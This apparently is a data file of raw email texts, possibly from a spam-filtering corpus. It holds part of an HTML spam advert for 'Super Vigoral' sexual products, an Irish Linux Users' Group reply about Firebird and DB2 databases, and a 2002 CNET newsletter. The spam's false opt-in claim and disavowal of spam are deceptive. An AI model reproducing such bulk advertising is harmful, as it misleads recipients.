                     Vigoral&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;i&gt;&lt;b&gt;&lt;font face=3D"Verdana" siz=
 e=3D"2" color=3D"#FFFF00"&gt;For
                     Men&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"33%" height=3D"100" align=3D"center"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"136" bgcolor=3D"#CCCCFF" height=
 =3D"81" bordercolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"138" align=3D"center" height=3D"77"&gt;&lt;font c=
 olor=3D"#FF00FF"&gt;&lt;i&gt;&lt;font size=3D"5" face=3D"Impact"&gt;SUPER&lt;/font&gt;&lt;/i&gt;&lt;/fon=
 t&gt;&lt;b&gt;&lt;font size=3D"5" color=3D"#FF00FF"&gt;&lt;font face=3D"Tahoma" size=3D"5"&gt;
                     &lt;/font&gt;&lt;font face=3D"Tahoma"&gt;
                     Vigorette&lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5=
 " color=3D"#990099"&gt;&lt;br&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D=
 "#9966FF"&gt;For
                     Women&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
           &lt;td width=3D"33%" height=3D"100"&gt;
             &lt;div align=3D"center"&gt;
               &lt;center&gt;
               &lt;table border=3D"1" width=3D"134" bgcolor=3D"#CC0066" height=
 =3D"83" bordercolor=3D"#FFFFFF"&gt;
                 &lt;tr&gt;
                   &lt;td width=3D"126" height=3D"79" align=3D"center" bgcolor=
 =3D"#CC0066"&gt;&lt;font size=3D"5" color=3D"#FFFFCC"&gt;&lt;i&gt;&lt;font face=3D"Impact"&gt;S=
 UPER&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;b&gt;&lt;font face=3D"Tahoma" color=3D"#CC6699" size=3D"5=
 "&gt;
                     &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=3D"#FFFF=
 CC"&gt;Vigorgel&lt;/font&gt;&lt;font color=3D"#990099" face=3D"Tahoma" size=3D"5"&gt;&lt;br&gt;=
 &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D"#FFFFFF"&gt;For
                     Everyone!&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;/center&gt;
             &lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 &lt;table border=3D"0" width=3D"100%" bgcolor=3D"#FFFF99" height=3D"62"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"29" bgcolor=3D"#800080"&gt;=
 &lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;All
       Only &lt;u&gt; $24.99&lt;/u&gt; each &amp;amp; Get FREE Shipping!*&lt;br&gt;&lt;/font&gt;&lt;font f=
 ace=3D"Verdana" color=3D"#FFFFFF" size=3D"2"&gt;-LIMITED
       TIME OFFER-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"29" bgcolor=3D"#FFFF99"&gt;=
 &lt;b&gt;&lt;u&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FF0000"&gt;&lt;a style=3D"color=
 : #FF0000"&gt;-&amp;gt;
       &lt;/a&gt;&lt;a href=3D"http://www.mailcomesandgoes.com" style=3D"color: #FF0=
 000; text-decoration: underline"&gt;CLICK
       HERE TO ORDER NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;/p&gt;
 &lt;table border=3D"0" width=3D"470" bgcolor=3D"#800080" height=3D"68"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" align=3D"center" height=3D"64"&gt;&lt;font face=3D"Arial"=
  size=3D"1" color=3D"#FFFFFF"&gt;Your
       email address was obtained from an opt-in list, Opt-in MRSA List &lt;br=
 &gt; &amp;nbsp;Purchase
       Code # 248-3-550.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from thi=
 s list, please
       &lt;a href=3D"mailto:print5@btamail.net.cn?Subject=3DUnsubcribe Immedia=
 tely" style=3D"color: #FFFFCC"&gt;Click
       here&lt;/a&gt; and press send to be removed. If you have previously
       unsubscribed and are still receiving this message, you may email our=
  &lt;a href=3D"mailto:sortofridiculous@bigfoot.com?Subject=3DAbuse Report" st=
 yle=3D"color: #FFFFCC"&gt;Abuse
       Control Center&lt;/a&gt;. We do not condone spam in any shape or form. Tha=
 nk You
       kindly for your cooperation&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font face=3D"Arial" size=3D"1" color=3D"#9966FF"&gt;*Note: free shipping =
 on orders of
 three or more of any product.&lt;/font&gt;&lt;/p&gt;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</si>
  <si>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[ILUG] Drop in replacement for Ingres Database?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: Paul Linehan [mailto:plinehan@yahoo.com] 
 &gt;
 &gt; There are two open alternatives that I can think of
 &gt; that don't appear to have been mentioned 
 &gt; elsewhere in this thread.
 &gt; 
 &gt; 
 &gt; One is Firebird (this is my personal favourite).
 &gt; It is http://FirebirdSQL.org and you can
 &gt; purchase support contracts here
 &gt; www.ibphoenix.com.
 Indeedy - I had never even heard of firebird until we started a new job
 last week with a client who uses it.  So we popped it onto a box
 downstairs and wow - it is fast.  Comes with some lovely client tools
 also.  Supports all the db goodies, transactions, stored procedures,
 triggers.
 &gt; It's really amazing to think how much they've got
 &gt; out of a db that is only 4 MB in size - that's 10
 &gt; times smaller than the Oracle *_client_*.
 &gt; 
 &gt; 
 &gt; Having said all of the above, Oracle is really
 &gt; a super product, but ya pays ya money...
 &gt; 
 IBM's db2 is another cheaper alternative to Oracle.  Free single
 developer license downloadable from their website.
 Fergal.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET DIGITAL DISPATCH: Saying good-bye to free
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Dispatch Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_a.gif" width="442" height="60" border="0" alt="Digital Dispatch"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=10 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td  width=430&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       		&lt;/table&gt;	
 	&lt;/td&gt;
 	&lt;!-- Skyscraper column --&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/dd_b.gif" width=160 height=18&gt;&lt;br&gt;
 &lt;!-- START AD --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 &lt;tr&gt;
 &lt;td align=center bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width=120 height=10&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- shopping  --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzW4FSbyotR-pp7us2QfiR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.6100green_160x600.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /shopping --&gt;
 &lt;!-- /ad --&gt;
  &lt;br&gt;
 		&lt;!-- right column content --&gt;
 &lt;!-- search form --&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 &lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
  &lt;option value="http://cnet.search.com/search?tag=ex.digital.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.digital.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 				&lt;!-- NEWS BLOCK --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_techNEWS.gif" alt="Tech News News.com" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" cellpadding=0 cellspacing=2 border=0&gt;&lt;tr&gt;
 				&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzY4Kf2vvKNXLTSyPWc3PR" &gt;Apple to expand iMac LCD display&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnXEWNoysxoLkkTKhn-dR" &gt;It ain't heavy; it's my laptop&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2c-Nq6R6fez6pa6cIJuR" &gt;Gateway touts chic yet cheap PCs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAIuv5QEI_rjups7LLZ5ZR" &gt;Apple's iPod comes to Linux&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndaN5102OO3Nt-tKChBwnR" &gt;Dell PCs coming to a mall near you&lt;/a&gt;&lt;p&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdL3uaQaOYlcGhVIlcU_eR" &gt;More CNET News&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /NEWS BLOCK --&gt;
 				 &lt;br&gt;
 				&lt;!-- TOP DOWNLOADS --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_TOPdwnlds.gif" alt="Top Downloads" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xDRDmpvqJzDxDXozLCyR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkUNpeGWvjg0SxiPZvH6lR" &gt;Quintessential Player 3.4&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWaOAV8vEXtTbDS-BJjho4R" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwjRqfzSmCs3CyJqsjeorR" &gt;AI Picture Utility 6.2.1&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUrntnmGg3F-erCpGY9iR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF77qorK2Rl28NRQSnqQPR" &gt;ICQ 2002a Build #3728&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6jNLGtsDDFWVhZSgRXBnR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBsy9abyHWXl_kj2ZBSJuRR" &gt;Deck 3.5 (for the Mac)&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /TOP DOWNLOADS --&gt;
 				 &lt;br&gt;
 				&lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sj9glgtIobvZm5yGKIaZR" &gt;Dell Latitude C510/C610 series&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUf02FYR7VrqMtNXjoCKqdR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naPmSLNTieplrQ8kasp4eR" &gt;Toshiba Pocket PC e310&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyk_lg_21lXdIl9Oi-UiyR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dz-iCWJMr9i_f_B0NLnlR" &gt;AutoCAD LT 2002&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKgZRth7kWdT_pfmeDx04R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lr5IW9QhmBz6gEwTinhlyR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFEFDJeqXH3XX8owMnerlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section --&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 			&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 &lt;!-- date --&gt;				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 11, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=76 align=right&gt;
 						&lt;img src="http://www.cnet.com/i/dp/hd_janicec.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 						--Janice Chen,&lt;br&gt;
 						editor in chief,&lt;br&gt;
 						CNET Reviews&lt;br&gt;
 						&lt;/font&gt;
 					&lt;/td&gt;
 					&lt;td width=10&gt; &lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 						&lt;font size="-1"&gt;
 It was a crushing blow to discover that &lt;a 
 href="http://www.cnet.com/software/0-3227852-1204-9931175.html"&gt;Vindigo&lt;/a&gt;, my
 all-time-favorite Palm app, was no longer free. Twenty-five bucks
 wasn't steep, but the principle of paying for a former freebie
 was hard to swallow. Not that hard, though; surprising
 myself--and my fellow cheapskates--I've discovered that I'd
 rather dish out the dough than go Vindigo-free myself.
 &lt;p&gt;
 That's what Web-based e-mail providers are banking on. Now that
 most of us have gotten sucked in by those gratis Web e-mail
 accounts, most "free" Web e-mailers have started charging for
 premium services or imposing strict limitations on free accounts.
 Read our &lt;a 
 href="http://home.cnet.com/software/0-3227888-8-20089773-1.html"&gt;reviews&lt;/a&gt; 
 of the four top services to see what you get if
 you dish out the dough (or not)--and which to avoid if you want
 to stay spam-free.
 &lt;p&gt;
 Surfacing on this week's Buzz Meter is another free-gone-fee app.
 The latest version of the popular file-sharing software BearShare
 now offers a paid version that lets you search and download
 without those annoying ads. Maybe the best things in life are now
 those with a fee.
 &lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;font size=1&gt; &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 				&lt;td width="175"&gt;&lt;a href="#buzz"&gt;&lt;img src="http://www.cnet.com/i/dp/THISweeks_BUZZ.gif" alt="This Week's Buzz Meter" width="175" height="18" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;td align="left"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#buzz"&gt;WorldCom woes continue&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" height="8" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;
 			&lt;font face="Arial, Helvetica"&gt;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href="http://clickthru.online.com/Click?q=06-fP6uI482ubw9FVNmap_vCgSyiL4R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/042502mpsplayers.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=1b-wAnhI3N2I6po9PjQ1U5MauO37xrR" &gt;&lt;b&gt;Next-generation MP3 players&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;These three hard drive-based MP3 players turn last year's models into paperweights.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWEtvpIvS8IeOdSKzjX1iR" &gt;Mojo rising: TDK's new MP3 CD player&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB680jDU6m-EDvznhjonlZR" &gt;The Nomad Jukebox 3 breaks new ground&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;MP3 &amp;amp; audio&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUTF1Y12xCjjvDSwizzcR" &gt;Creative Labs Nomad Jukebox 3&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6VKduOEJKns2asfI8UkRR" &gt;iRiver SlimX iMP-350&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfYoRyyaaf70SVbToBBPR" &gt;Sonicblue Rio Volt SP250&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGSXgwVYFigi7yr9FKgnR" &gt;Sonicblue Rio Riot&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqkpRhu1LydDX7NdmUVSeR" &gt;Archos Jukebox Recorder&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0Ww9YFp-E9kHF6q-jPexAyR" &gt;See all most popular&lt;/a&gt;&lt;/b&gt;&lt;br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 software --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_soft.gif" alt="Software" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwBYId70nie23s1N87hJlR" &gt;CNET reviews four no-cost Web e-mailers&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
